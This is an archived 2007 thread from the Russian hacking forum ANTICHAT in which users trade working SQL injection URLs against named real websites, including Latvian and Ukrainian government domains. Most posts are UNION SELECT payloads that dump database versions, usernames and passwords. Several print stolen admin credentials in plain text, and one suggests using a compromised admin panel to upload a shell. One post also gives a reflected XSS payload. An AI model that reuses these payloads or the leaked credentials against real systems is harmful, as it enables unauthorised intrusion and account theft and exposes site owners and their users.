ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.03.2007, 16:24
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2Ksander
Нет там скули...
_http://www.fm.gov.lv/search.php?id=2 и
_http://www.fm.gov.lv/search.php?id=3-1 отличаются
|
|
|
27.03.2007, 16:28
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://selo.bg/news_details.php?id=-889+union+select+1,2,convert(version()%20using%20cp1251),4,5,6,7,8,9/*&lang=bg
http://www.gramis.com/novina.php?id=-6%20UNION%20SELECT%201,2,3,concat(username,0x3a,password),5+from+users/*
http://www.gramis.com/admin/
http://www.verticalworld.net/news/news.php?id=-419+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+limit+3,1/*
|
|
|
|
27.03.2007, 16:55
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
www.regenwald.org
Код:
http://www.regenwald.org/news.php?id=-1+union+select+1,2,3,version(),database(),user(),7,8,9,10,11,12,13,14/*
|
|
|
|
27.03.2007, 17:08
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Как мне нравится когда удаётся всю инфу достать (версия мускула там 4):
Код:
http://www.numizmatik.ru/news/read.php?news=-1+union+select+1,2,3,concat(fio,char(58),userlogin,char(58),userpassword,char(58),email),5,6,7,8+from+user/*
P.S. скуля траф жрёт - т.к. все записи выводит, так что кто за траф платит...
Последний раз редактировалось Grey; 27.03.2007 в 17:23..
|
|
|
|
27.03.2007, 17:55
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
www.quadrasoft.com.ua
Код:
http://www.quadrasoft.com.ua/web/news.php?id=-1+union+select+1,2,concat(user(),char(58),version()),4/*
|
|
|
|
27.03.2007, 20:06
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://www.bulfurniture.com/php/news_more.php?id=-52+union+select+1,username,3,4,5,password,7,8+from+user/*
Код:
http://www.horoskopa.com/signs.php?id=-8+union+select+1,convert(version()%20using%20cp1251)/*
lukabloom.com
Код:
http://www.lukabloom.com/shop.php?id=-98%20UNION%20SELECT%201,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14+from+admin/*
user:lukabloom
password:luka_shop27
http://www.lukabloom.com/admin/ (в нашем случае админка
служит для заливки шелла)  |
|
|
|
27.03.2007, 21:46
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Вот эту смотреть только через проксю:
Там много таблиц, есть и с более интересными названиями, но их не могу выкладывать по правилам форума, для примера таблица с юзверями.
Код:
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+48,1/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(109,111,115,95,117,115,101,114,115)+limit+0,1/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,concat(id,char(58),name,char(58),username,char(58),email,char(58),password,char(58),usertype),4,5+from+Mambo.mos_users/*
--------------------------------------------------------------------
Код:
http://www.filmec.ru/index.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
Код:
http://www.rmdb.ru/?company&id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
|
|
|
|
27.03.2007, 22:24
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
мб было, но..
Код:
http://www.biosens.ru/index.php?res=folder&rec=-1+union+select+1,concat(login,0x3a,password)+from+users/*
* admin:admin
* news:111
* news2:222
* birth:birth
* Andrei:4444
* Kirimov:kir251
там же пассивная xss
Код:
http://www.biosens.ru/index.php?res=folder&rec=%3Cscript%3Ealert(/xss/)%3C/script%3E
|
|
|
|
27.03.2007, 23:14
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
Код:
http://www.voladm.gov.ua/news.php?id=-1804+union+select+1,2,3,4,5,user,7,8,9,10,password,12,13,14+from+mysql.user/*
|
|
|
|
27.03.2007, 23:36
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.tiic.ru/sub_t.php?id_ur=3&id=-1+union+select+1,2,concat(username,char(58),user_password)+from+forum_users/*
P.S. скуля траф жрёт - т.к. все записи выводит, так что кто за траф платит...
P.P.S вторая такая за сегодня) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
